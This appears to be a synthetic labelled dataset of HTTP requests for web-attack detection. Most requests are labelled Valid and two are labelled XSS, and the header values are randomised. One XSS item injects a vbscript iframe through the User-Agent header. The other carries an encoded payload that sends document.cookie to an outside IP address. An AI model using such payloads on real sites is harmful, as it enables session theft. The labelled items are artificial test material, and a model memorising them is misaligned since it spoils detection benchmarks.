From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Sat, 27 May 06 09:58:36 GMT
If-Unmodified-Since: Fri, 25 Jan 08 09:17:58 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 24 May 08 24:44:50 UTC
Max-Forwards: 530
MIME-Version: 9.8
Pragma: ecay5Rwa=wtihuacw
Proxy-Authorization: fir8i hie6oar=onheeas
Authorization: Basic b3dyYTplcklkaGc=
Range: -47448,86125-296,-084
Referer: /nnhnb/d8mtkfl/Se5ard/eemsmoe/rad8.jpg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/9.3 (compatible; aart; Linux i386; oEhnse; eaudodl6nh)
UA-CPU: MIPS
UA-Disp: 899,4850,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 031x428
Via: q0itog/7.0 67.157.245.129, 4.2 www.a2jusddh.jpeg:911
Transfer-Encoding: cjcuh
Upgrade: iiolwe/1.1, eitto/1.2, awv8/6.7
Warning: 612 www.dskecR.jpg:8674 "r2eeilfhshdeecbm" 
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 2466804840974150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24926
Start - Id: 46577
class: XSS
GET /adstooifttct/mV8mail4TxAqP5pi/t3ybW9db24vvlON1a1rM/xqgALRWTUyo0c.3y/mbZvRYen4O_eb1E/tuvBIK@5DLt/i@xX/siOdud.swf? HTTP/1.1
Host: 72.136.229.74
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: baal-O7es1a;q=0.3, 2reblna-3asru5y, autunt-eo;q=0.0, adc8n0hh-v, e-rbn
Cache-Control: no-store
Client-ip: 140.154.179.232
Cookie: vooi0xg=4
Cookie2: $Version="15"
Date: Thu, 24 Feb 05 21:24:13 CET
ETag: W/"j-GvuB-Y6UUJL8q3fp"
Expect: oai0tt
If-Modified-Since: Fri, 24 Apr 09 06:47:20 CET
If-Unmodified-Since: Sun, 27 Jul 08 02:57:14 CET
If-Match: *
If-None-Match: "iCeELUc9R202odJJf5g"
If-Range: *
Max-Forwards: 972
MIME-Version: 6.1
Pragma: 4naerubo='hm'
Proxy-Authorization: NTLM M2VhU3NBb25hOWZoZ2lub2NiZXQxUm50YXRzdHRUbm9lb3NtUm4=
Authorization: NTLM b3JsbXNkdlVzYUl3aWVnQ3RvZWF5ZXNpTmVkYW9uZTByaVRlc3A1cGNiQlRlZQ==
Range: 70-
Referer: http://tejicLya.com/hRSc/vpnne5/lotrrgs/aEbNhnt/oeknehz.asp
TE: trailers,deflate;q=0.4
Trailer: If-None-Match
User-Agent: <iframe     src=   "   vbscript:[alert   ('dwrlfem1c');]    "  >
UA-CPU: PowerPC
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5605x1554
Via: 0.2 235.45.121.98, HTTP/8.9 www.NeWl.tiff
Transfer-Encoding: deflate
Upgrade: ieek/6.0, 9suhri/7.2, tEdUn/4.8, nen3O/8.2
Warning: 179 24.207.141.105:00 "tAos9srMecair0" 
X-Forwarded-For: 222.189.31.195
X-Serial-Number: 70953324571970
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46577
Start - Id: 11365
class: Valid
GET /ka/nm5sQ3Au0u4LrUDhH-1/6Z/ac4x.6K07eIZg_6g-P5/Scdsjrlir/TE/6y0yIItxiaiet/tetmfahcn/iHNTMHOWQc4GOyq.pl?os8RuueB5aai=sletE&339YIgDN@t=5233&itlaud=-0&er=iframe&rst=6192881 HTTP/1.1
Host: 55.208.9.229
Connection: keep-alive
Accept: application/x-tar, text/html
Accept-Charset: iso-8859-2, utf-8;q=0.2, euc-jp, koi8, utf-8;q=0.0
Accept-Encoding: *
Accept-Language: Olatk-A, aiovseci-m;q=0.3, tt-al, t-s
Cache-Control: min-fresh=21
Client-ip: 218.1.121.67
Cookie: i9Uate2ta79l7=6;Pmqvi=aeg5us;idsster8on1dlr=37290;hg0do50a_NNSKA=4808002619;yQvyMevscript3ANhtpass=uobellbnfDamohstne
Cookie2: $Version="6"
Date: Wed, 17 Feb 10 14:36:33 CET
ETag: "AL1P3Im9xyb_Ng.B"
Expect: 100-continue
From: tXstmn@rlemsJto.cz
If-Modified-Since: Tue, 12 Jul 05 18:18:20 UTC
If-Unmodified-Since: Sun, 24 May 09 01:34:21 CET
If-Match: *
If-None-Match: "3q.rYOOFtMCC7MHSCAw"
If-Range: Mon, 03 May 04 07:55:48 UTC
Max-Forwards: 7
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXNhdHQ1ZWxmczExdFJ0Y2hpdnFBMmNkUHJyWWdpVkVlc2FpdWV0bmVzbg==
Authorization: TrLYl sn3pa=tewe
Range: -97,143727-
Referer: /toielk.gz
TE: chunked;q=0.5,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.6 (X11; U; Solaris 1.6; ct-e0; rv:8.8.6) Gecko/79972232
UA-CPU: StrongARM
UA-Disp: 400,6938,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6133x6762
Via: FTP/9.4 www.odrci.jpg, FTP/2.4 11.94.55.49
Transfer-Encoding: jIgwf
Upgrade: 07rd3w/0.6, sawral/4.2, iioa/6.4, luE/7.0, isdes/2.0
Warning: 883 www.eeiyiwe.jpeg "akusdr" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 0505318
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11365
Start - Id: 18249
class: Valid
GET /mzh82FvvbRJH5yh6f/ao/e0e5nNnVAfp4eCIrai/aaiatP9fdhatmrm4/iuaetmietrhrmtidpx/aodha1alsk/ritrtoedhihxs/em9EUvCG0TVdMGq-lV7/sos7/mrS7tri9ef0a3etfmDo/qOisaadr.js? HTTP/1.0
Host: 144.17.4.221
Connection: close
Accept: */*
Accept-Charset: utf-7;q=0.6, x-mac-chinesesimp;q=0.0, ks_c_5601-1987;q=0.0
Accept-Encoding: deflate;q=0.1
Accept-Language: Mantgyrs-hrtdo;q=0.2, Amhs-Ic6eeli, g9rsisu-tog, h7o-X1aq;q=0.3
Cache-Control: max-stale
Client-ip: 58.84.146.191
Cookie: smuu3tqrebcSq6=406274;zsehtot=@ee ;nyiemtkrhe=6
Cookie2: $Version="214"
Date: Wed, 20 Jan 10 16:12:36 UTC
ETag: "qBXzJyw3LgGQZ0kD"
Expect: 100-continue
From: anwits@qdrec.org
If-Modified-Since: Sat, 02 Dec 06 05:11:37 CET
If-Unmodified-Since: Sat, 22 Mar 08 07:45:14 UTC
If-Match: *
If-None-Match: *
If-Range: "9vpJsrRAyqVpVaOo"
Max-Forwards: 376
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: cjdck o0Qk=r8ie
Authorization: mxde wduo=0tanlo5a
Range: 41-16
Referer: /eteq/nrsif/Trito/er2f7h/Udaau.conf
TE: chunked;q=0.4,trailers,chunked
Trailer: If-Modified-Since
User-Agent: uni3cdancyodoeeiuc
UA-CPU: Sparc
UA-Disp: 3033,0049,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1021x3555
Via: 3.9 46.62.191.85
Transfer-Encoding: identity
Upgrade: oeEul/3.4, B6ened/3.9, oRoC/0.7
Warning: 763 212.227.140.5:8348 "gddLcd3eaoscn8iho" 
X-Forwarded-For: 27.26.79.206
X-Serial-Number: 296173
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18249
Start - Id: 11900
class: Valid
GET /pmntahhseulbhqns/57eKTmochaafrom/rnatecscNzn9aasprpm/A33exvbscriptQP/nrx/1@BqQlS-xs.UtE3xth/nxs.pl?an4lsedHOsreeGi=790&KIo4=nbliepsDh8tdkre&position0P9mZ0input9vusr=Ytshitrn&tf=tmpirq%7Etcv%26eS HTTP/1.0
Host: www.den2rurnf.be
Connection: close
Accept: */*
Accept-Charset: iso-8859-8;q=0.3
Accept-Encoding: *
Accept-Language: m9scaeda-3ss;q=0.3
Cache-Control: no-store
Client-ip: 18.171.232.227
Cookie: stUntpg8nie=r ;in7eieeNmiDzf= ;tstsooqrs2=faiep
Cookie2: $Version="556"
Date: Thu, 10 Jun 04 15:24:30 CET
ETag: W/"Xeo@EaWGnDsJT@6"
Expect: bs0tohg
From: dxse@adueeHiJoe.it
If-Modified-Since: Sun, 18 Apr 10 22:16:35 CET
If-Unmodified-Since: Thu, 07 May 09 21:21:26 CET
If-Match: "eOyyLJHkyhB4hfSis3b"
If-None-Match: "5mYjWNhP5E.@6iMc6Sk"
If-Range: Mon, 13 Jun 05 14:41:10 UTC
Max-Forwards: 9335
MIME-Version: 7.3
Pragma: 4eaL='soiKNs'
Proxy-Authorization: sero tcgs=n3rcmn
Authorization: emel oohcn=ey9uap
Range: 477-56
Referer: /rxUehb.cgi
TE: chunked;q=0.7,gzip
Trailer: If-None-Match
User-Agent: Teaiocwemebee9cGwk0s
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2025x4273
Via: 6ndlex/7.9 183.179.113.71, 2.8 www.pgcrV.jpg, 8.1 www.d2a4.gif
Transfer-Encoding: zEbs
Upgrade: iena/2.8, eot/6.3, eoe/2.9, dteT/9.3, QCLo6/1.2
Warning: 336 www.N0ys.htm:4 "eHsiwTfaeeetyrdoo" 
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11900
Start - Id: 15770
class: Valid
GET /xbs--8.mxS5JZW8/ej.css?2n3mh9bd=sg4torsdmtem&t2991svoerbhd=59eJnaale&YIcu=czzhwceE3egt&dif=ceUnes+rdgroup+byo&Dftgtu8hosf=61 HTTP/1.0
Host: www.uhrswgs.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress;q=0.3, deflate, deflate, compress;q=0.8, compress;q=0.6
Accept-Language: sCtv-bOI;q=0.1, iy8t-ra6;q=0.0, larr-Idur, tn8s9oh-o, etonrNy-e;q=0.8
Cache-Control: only-if-cached
Client-ip: 119.143.124.35
Cookie: ttonNe9merd=hhio;suyhseopefeaTo=svrA.DV7rk;YX74dDCrjk=oo sebi cftpesi;1erNeteNlrebnt=sm8Lc.LojC5r;AP7VZ7NGNLCD=>s l;eeisrdcnnri8=srcopynahr4mae3
Cookie2: $Version="46"
Date: Sun, 13 Jul 08 20:48:02 CET
ETag: "cFaXT@n3DkvQ6DPaZ"
Expect: 100-continue
From: ue8iwlO@tint459.com
If-Modified-Since: Sun, 24 Apr 05 11:53:19 CET
If-Unmodified-Since: Thu, 06 Dec 07 22:07:25 CET
If-Match: "5Vi8-ypc7IXpEUH"
If-None-Match: "IrO3o@KrZZ1zrbn"
If-Range: Fri, 12 Jun 09 22:13:51 CET
Max-Forwards: 9
MIME-Version: 4.2
Pragma: nmsa8s=8foahise
Proxy-Authorization: NTLM YThiZ3N3ZmR2aXdlYjJpYW1ueGRlZVRmbjluaWVBdW1paW1saGxvOQ==
Authorization: Basic c3JtaDBhMXI6MmxtYWh0aw==
Range: -9013
Referer: /Oo2vc/stbthlut/be5tsT.doc
TE: deflate,deflate;q=0.0,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.6 (compatible; Konqueror/0.1; Solaris; tEraeBjm)
UA-CPU: StrongARM
UA-Disp: 238,6520,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 055x984
Via: 2.0 17.243.213.7, 7.3 45.63.125.166
Transfer-Encoding: deflate
Upgrade: tlub/4.7, hksiTB/4.2, jtoi5n/2.3
Warning: 404 124.90.161.164:454 "uesttf9iRtd" 
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 698228
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15770
Start - Id: 20227
class: Valid
GET /9o2.Z/qyx/oadmttk.tiff?r1rnoud=5964509311&alE=17&iaOrPylxlwEer=8&Uewt=14%7C&eEmdanWbDrq=pcCHJ2I&bcss=2756&ta8bohueixhr=14 HTTP/1.0
Host: 3.48.254.83
Connection: close
Accept: application/*, application/*
Accept-Charset: x-mac-ce, iso-8859-9
Accept-Encoding: 
Accept-Language: zea-whr;q=0.9, els-ile, CLdamter-Mh
Cache-Control: only-if-cached
Client-ip: 159.155.218.29
Cookie: c3dlo=6491704;3Eboot.inihFJ@rE=hiAHB-;Eaptremo8t6s=9ohtacceszk;PRZbZElMN=ae0w=wo3Dinclude1dnodea;QMBO.0=7209;atfoumc0=iat4t
Cookie2: $Version="007"
Date: Mon, 15 Mar 04 07:32:10 GMT
ETag: W/"Wu.ydJ2q0TITGIDW6"
Expect: 100-continue
From: 7a8pnny@to7yoS.cz
If-Modified-Since: Mon, 20 Mar 06 24:41:49 CET
If-Unmodified-Since: Sun, 26 Apr 09 14:15:42 UTC
If-Match: "l8IHPK-hOyJVLVW_h7"
If-None-Match: *
If-Range: Wed, 17 Sep 08 05:21:03 UTC
Max-Forwards: 2770
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: NTLM aGhqb3NydGVobjZhdFhBMW90ZGtydDNyMmNFb2liSW5idG9uYUF5YmVjb2Vo
Authorization: Digest opaque="0sy97ps"
Range: 8-0,-1872,-4
Referer: /b8ponilo/d2edfr/hoxWk.mdb
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/7.0 (compatible; Konqueror/9.7; Linux i386; sdt4otfjua; o7lh2eu; ireta)
UA-CPU: 68000
UA-Disp: 7522,1953,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4940x047
Via: 8.2 www.aPhbvMa.png, fts/6.5 78.78.197.219
Transfer-Encoding: gzip
Upgrade: ehild/2.2, sbuaee/6.5, o2oe/9.8, eape/2.8
Warning: 624 80.190.32.100 "nxwnhoRO2aeltetuvxd6" "Fri, 14 Apr 06 17:56:57 GMT"
X-Forwarded-For: 93.221.51.3
X-Serial-Number: 554046996797250
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20227
Start - Id: 5718
class: Valid
PUT /cnanEzooheil/eUa9nbE4lhra2A/nim_kPyp7GM/netcatlikelIW@LDXWCR/E0esw9S1Ieekorhes/7eY07tcdc@eV/EIahatbumddoN.gif? HTTP/1.0
Content-Length: 72
Content-Language: udesednb
Content-Encoding: identity
Content-Location: http://www.syrd.org/0efkmr/ootte.gif
Content-MD5: ZXNldGVvc2R0bzdBbXJ3cA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Jun 07 14:38:24 UTC
Last-Modified: Sun, 10 Sep 06 07:14:27 CET
Host: www.qiuOgish.gov
Connection: close
Accept: */*;q=0.3
Accept-Charset: shift_jis, iso-8859-15, cp-936;q=0.9
Accept-Encoding: compress;q=0.6, identity, gzip, compress
Accept-Language: *
Cache-Control: max-age=0
Client-ip: 27.34.47.58
Cookie: rEneteheeber=sreittnSoaqddo;rnnjh7h=te;sRyzl_z5Nbink=3;edeL0mrPe=8bo.gd9cnG;moi=8
Cookie2: $Version="32"
Date: Sat, 02 Apr 05 13:45:21 CET
ETag: "VVGNW8zSXxQI4.C1N"
Expect: yt8eeyi
From: ototLn2u@5heey.uk
If-Modified-Since: Mon, 12 Jul 04 23:51:40 UTC
If-Unmodified-Since: Thu, 25 Jan 07 04:40:45 CET
If-Match: *
If-None-Match: "LjU4m1B1M-dh@A0jyk"
If-Range: Wed, 11 Feb 04 23:58:29 UTC
Max-Forwards: 92
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic YWlnN24yMTo2a255
Authorization: Basic ZWozbGdvOm9lYnR0b2My
Range: 40090-
Referer: /ekejt/teqsA/neliohei.fgf
TE: deflate;q=0.3,trailers,gzip
Trailer: Date
User-Agent: qaheTet1e (i378RW)
UA-CPU: Sparc
UA-Disp: 1912,4963,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3416x9061
Via: HTTP/8.3 156.88.239.47, HTTP/4.0 www.oant.htm, yo2e5q/6.8 www.idyo4do.css:07957
Transfer-Encoding: gzip
Upgrade: 3ewae6/1.5, hmdtw/9.4, ubskbu/3.6, Dntijt/2.7
Warning: 932 84.207.154.52 "lweaeiRmollF5" "Sun, 27 Nov 05 06:11:04 UTC"
X-Forwarded-For: 129.100.56.49
X-Serial-Number: 7835393170
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

i8ezen1e=538703&grh1EhtkseinyaA=w0)Ene3nSa&SI1Gxtu=ovaI-a&pcr0irt=2156

End - Id: 5718
Start - Id: 46972
class: XSS
GET /tnndsHttsiko30wc/aMsox.NjJG4kPWc9g.shtml?moZeEoommnh=%3Cimg+src++++%3D+++%22++mocha%3A%5Bwindow.open%28%27http%3A%2F%2F96.53.244.21%2Fndveen.swf%27%2Bdocument.cookie%29%3B%5D+++++%22++%3E&nmiYde2tgtz=6Nt%3Cg3Oa+ HTTP/1.1
Host: 110.53.74.214
Connection: keep-alive
Accept: application/*;q=0.3, video/*;q=0.1, text/*
Accept-Charset: *
Accept-Encoding: identity;q=0.1
Accept-Language: amo18tEp-tA9R;q=0.1, r-msnroi
Cache-Control: mn='Cckml'
Client-ip: 28.22.243.204
Cookie: jttAi=19602;am=gP6kK;P54NOqhOwget8eY=82jr-ytZDWEP;ute4t=8xhIXArvL_
Cookie2: $Version="577"
Date: Sat, 01 Jul 06 22:24:59 GMT
ETag: W/"2fZnAUrUeZLbdBbr1u"
Expect: 100-continue
If-Modified-Since: Sun, 15 Oct 06 13:53:38 CET
If-Unmodified-Since: Thu, 24 Jul 08 23:12:51 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1829
Pragma: qlt='geieoto'
Proxy-Authorization: NTLM dERkdGN0N2RobWhKb2VoY2M1dXJ1ZWlpaXNXenVuYTZoMGM=
Authorization: Basic TWJFbGFzeWM6dHFzbzcxcw==
Range: -299,87-,670-62
Referer: http://cltsnrr.st/nfi6ket.rar
TE: trailers
User-Agent: Mozilla/1.5 (compatible; nteEn9r; Mac OS X; tN4h; ysaeiEsh)
UA-Disp: 2976,173,32
Via: 6.6 216.39.216.108, 9.2 134.189.248.198, FTP/7.7 www.2IateIem.html
Transfer-Encoding: compress
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 851 www.iRa0dmoc.js "OTesetongilrtiwreAm" 
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46972
Start - Id: 23391
class: Valid
GET /CIR/RXJOiSallMrc8_K0a/zyXbd7/0eelird/nullqJ_1Som/Arsn7irterettrliayFi.jsp?II0-B-DnodeoWG=hEiadeAisE5&fb=88&ieotafgo5=1488869&ldpiglq1=lpptteyitfe&oh2yabeeasetrs=childyxml&jz2e6nf5ticv=d&edT4th=s%28i&titbons=8571&ddynvTna=rqbpehlmv HTTP/1.0
Host: www.tAan5x.gov:82211
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.7
Accept-Encoding: *;q=0.3
Accept-Language: aoxehiUt-Etoeovop;q=0.6
Cache-Control: max-age=80
Client-ip: 37.218.142.139
Cookie: UtmpJccP2cmd=g4CTvqG;openYQvjdI=d2;w91mi9ohent2iie=>s;PI9Jo=61
Cookie2: $Version="42"
Date: Sat, 12 Feb 05 05:00:28 CET
ETag: W/"u0hOJaQV.ZRqffTIUx"
Expect: 100-continue
From: kisol@le4e.uk
If-Modified-Since: Sat, 04 Nov 06 24:23:20 GMT
If-Unmodified-Since: Tue, 14 Jun 05 06:24:42 GMT
If-Match: "1Wc6o9h0Vx5F.CE1hv"
If-None-Match: "qvpXNhSUaUe1_N0"
If-Range: *
Max-Forwards: 8
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: NTLM OWUxWWVhZWdsdG5uaWxyV3EzZW9leHVqb3RFdGNlZXRvT2FDbzBlcg==
Authorization: Basic bmFueWE6NGVzYXRlZQ==
Range: -403,-168018,-671
Referer: http://www.erire.be/dosa7j/9hhb4ij/2mTtiuu/gmb4tpL/MsDgen7.dll
TE: trailers
Trailer: Connection
User-Agent: Mozilla/4.7 (X11; U; SunOS sun4u 5.2; Oc-ou; rv:5.5.8) Gecko/97298722
UA-CPU: PowerPC
UA-Disp: 9336,5495,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 506x4645
Via: treo/9.5 www.rlne.tiff, 1.7 121.130.241.161, 8.0 www.enDt.png:89782
Transfer-Encoding: compress
Upgrade: afyagd/6.9, Lcmr8/4.4, yHo8/4.4, oeeIe8/7.6
Warning: 767 www.nutng.jpg "imrettlerf" "Thu, 18 Feb 10 04:49:03 GMT"
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 47626745385
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 23391
Start - Id: 7490
class: Valid
PUT /rf7xneovsep5sekoo/4jQHPHS/aQPc@lui7S5G/d3lrYreepqcoteegt/s9OJ3bYDH0Z7iDJlkd/6bF-/c-jZy5NS86NLt/dEgtTttrtohthxouhTd/Rgo2snyZCm_bqS.gif? HTTP/1.0
Content-Length: 164
Content-Language: v
Content-Encoding: deflate
Content-Location: http://Oqamg.uk/sgae.zip
Content-MD5: ZmNpYWltdXRsaFNlZDdlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 06 Jul 05 08:01:25 UTC
Last-Modified: Wed, 16 Nov 05 05:32:07 GMT
Host: www.dtln.net:80
Connection: keep-alive
Accept: video/quicktime;q=0.4
Accept-Charset: windows-1257;q=0.0
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 39.73.50.152
Cookie: lAnhCn9uosalh=oOPH9sCBBjR;arAeo=stdinasbmgnti7c;wuws7s=296863194;k-between.cynLLJ=o3el
Cookie2: $Version="4"
Date: Sun, 23 Mar 08 09:07:28 GMT
ETag: "jxkAaZXV9ft_EKIpIN"
Expect: 100-continue
From: nx7o@olnt1.uk
If-Modified-Since: Sun, 16 Jan 05 10:47:31 CET
If-Unmodified-Since: Tue, 10 Feb 04 04:11:03 GMT
If-Match: *
If-None-Match: "RUKEdwKAURMzpmX2f-"
If-Range: Thu, 16 Sep 04 01:00:29 CET
Max-Forwards: 65
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Basic YWFmYmFydDptQlRlZWFl
Authorization: NTLM b2doaDVvYzFQbFJpdGVvYTFlQW9zdHRhdXJqdEdud3BhaWt0Z2ljYXVuY294
Range: 8-,73-,-165528
Referer: /Dhshorm1/goeQrt/yeea.txt
TE: chunked,deflate
Trailer: If-None-Match
User-Agent: Meehe9oUzt (y14Eto; thaco2Up; e-_YT1e)
UA-CPU: MIPS
UA-Disp: 634,725,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9362x280
Via: 7.6 109.79.24.139, 3.6 www.naiuON.htm
Transfer-Encoding: seleo
Upgrade: eoi/4.2
Warning: 455 104.216.159.217 "0Ee2rsw" "Mon, 10 Jan 05 17:05:47 CET"
X-Forwarded-For: 192.154.138.206
X-Serial-Number: 527443957
----: ------------------------
~~~~~: ~~~~~~~~~~~

ircetTAa4nfa=sese2bTqaftt&oreeiiaLrgOSs=ilikesfh/otoidr&havingptd=a)?stuDsl]nt4eic%e:+&b6lSe=ritIa&'g6eua&mtUltirRadSecrr=11959055&n6eeiOnuqe=?z

End - Id: 7490
Start - Id: 20932
class: Valid
GET /Tgp/hbKJoo38gxId8ub/VCaLJhlibtmpnUsVcmdCT/c4bnemd/iNaCy_mvF5SxmX0wZS/cl5wue4/ou6eEitunstllnsseo.png?ITe9kfap7ldfeii=5205&ocatKsc@JbetweenMNp=4459532&p9hhn=okuk&t12E=ehomerseotdRnnji&rOxD=3300&Xe=Wauar&spETstne=ts%3Dwp-uaso8 HTTP/1.0
Host: www.Owsseecah.uk
Connection: keep-alive
Accept: text/html, image/*;q=0.6, image/jpeg;q=0.9
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=18443
Client-ip: 223.91.161.37
Cookie: ltnmd=059;GzjLJ=jtidracceptt/;ET9OfiLtKxd='d;z56nmueusTvtt=t x%Vrats;esutp=r;ee4o=Lrwda
Cookie2: $Version="195"
Date: Sat, 18 Mar 06 15:29:26 CET
ETag: W/"v_4FyylPyObApIV"
Expect: sbmyjz=nf9bml;nyae
From: nu4eam@Terdm.fr
If-Modified-Since: Sat, 07 Mar 09 04:37:54 UTC
If-Unmodified-Since: Tue, 23 Sep 08 18:52:53 GMT
If-Match: *
If-None-Match: *
If-Range: "_ltRZ4Orx.c4zq-uNrJ"
Max-Forwards: 310
MIME-Version: 6.6
Pragma: t6hdn9='9rsuS'
Proxy-Authorization: NTLM dGZtU3JiZGludDNZeW5pZWFkb3d5QXRiYTByemVzdDlzcGxpdmVuaWhsVGU=
Authorization: Basic dHJtZTpyZGUyaA==
Range: 91-032949,093525-505808
Referer: http://www.rlra.uk/m9oe0/n4zennr/cua1i/niea9.txt
TE: deflate;q=0.6
Trailer: Upgrade
User-Agent: Mozilla/8.7 (Windows; U; WinNT 2.6; 41-ss; rv:9.1.1) Gecko/58926469
UA-CPU: MIPS
UA-Disp: 0973,375,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 893x470
Via: 4.6 www.neRursqn.css
Transfer-Encoding: twnh; itt74=hthqfee
Upgrade: de7/0.8, frcre/7.5
Warning: 328 40.44.180.235:467 "waPoatoStfremrctoitm" 
X-Forwarded-For: 61.167.166.225
X-Serial-Number: 2430605
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20932
Start - Id: 7954
class: Valid
POST /dBFPCeyyVSwFznY3d/av/yK4894S8Lc/xyEyT/76K9zoSs.bnJ-sNQn-G.shtml? HTTP/1.1
Content-Length: 227
Content-Language: sm,et,Dl
Content-Encoding: identity
Content-Location: /tmhFg/tpsg7h/taur4/ei1E7ed/seso4o.nsf
Content-MD5: ZWl0ZW1TYVRydHJ3MGlhcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 28 May 07 01:59:53 UTC
Last-Modified: Sat, 07 Apr 07 08:25:32 CET
Host: 98.239.208.41
Connection: jevlthmv
Accept: image/png, audio/*;q=0.6, application/zip;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: rpwnnEd-roryen4m
Cache-Control: no-transform
Client-ip: 51.164.34.101
Cookie: fYSinv7hGm=804
Cookie2: $Version="9"
Date: Sun, 19 Dec 04 14:27:13 GMT
ETag: "tWBFFWmdwsjtHx6D"
Expect: ociler7e
From: uyh9nAn@dvblu.it
If-Modified-Since: Sat, 21 May 05 04:56:43 CET
If-Unmodified-Since: Thu, 14 Aug 08 20:27:32 GMT
If-Match: "w_EQUHrESRxX2HLd"
If-None-Match: *
If-Range: *
Max-Forwards: 391
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: rn4hq neshyx0=llearro
Authorization: Basic anI5OW5rbzpueml0WmVz
Range: -90383
Referer: /hlpntnn/pqywb.htm
TE: gzip,chunked
Trailer: Cache-Control
User-Agent: Mozilla/0.8 (Machintosh; U; PPC 6.5; rr-co; rv:0.6.8) Gecko/03550122
UA-CPU: MIPS
UA-Disp: 1557,362,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 094x6003
Via: 5.6 100.151.255.4
Transfer-Encoding: deflate
Upgrade: VSois/6.3, tfeN/4.9, tbc/5.6, iuyt/9.4, zza/9.7
Warning: 024 www.O7oep.htm "aennnrtyleRmrdHsfeP" "Wed, 26 May 04 05:12:06 CET"
X-Forwarded-For: 88.220.41.73
X-Serial-Number: 56493
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

n0OErmc=-3&cAtleotml=26818&i6crekabte5nt=1hlka4fQs&r1ci=18323&itaf0z=usqr1gK&sreaisellcxetw=82&ihes=@lnos&oahs=sasa&&tsihmldaiaysdu=462136&ii7hByasen=06&is=8211278&Jeusiinuha=s5tyznbAk&eteEE=eLInebtxo1az&wgetlike.3styleb=94

End - Id: 7954
Start - Id: 9771
class: Valid
GET /NUfU5PZP9positionfhB5access_log/sWvmdwz1/tzrtnqxtpOwEcw1teR/ehttpb-VvIbinh/pWacceptqGn_mVJ/1VM@0BLnXH/rIdn9er/BOP4hC_8tT/lX3.pl?aolD=cHs8z5P&aiq3ep=ozqwfIn&ge3nD9tlei=uhsfy&z1WP2ZVh2W6U=jKwfjaORD-jc&qetr0eOrndesT=+sn+z&9J=oDGEkFBIX&6oLth=eT0kI-Wvg5&2orru=eOQ07Q5w9sp&jilvttmceptgT=y3a7&0aixiKm=i0ii HTTP/1.1
Host: 122.252.153.45:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: koi8, windows-1254;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=1126
Client-ip: 129.84.99.73
Cookie: iincmheaVEnken=60429;Eneexeoiens=32582811;mbidcTs=8308310;mwoeoiprhborHe=70076812
Cookie2: $Version="4"
Date: Sat, 01 Nov 08 13:03:59 UTC
ETag: W/"7p48zrrmjz9Au2V"
Expect: mvfjxsso
From: aieu@9ohgieaLre.de
If-Modified-Since: Mon, 20 Apr 09 14:15:58 GMT
If-Unmodified-Since: Tue, 01 Apr 08 12:11:00 GMT
If-Match: *
If-None-Match: *
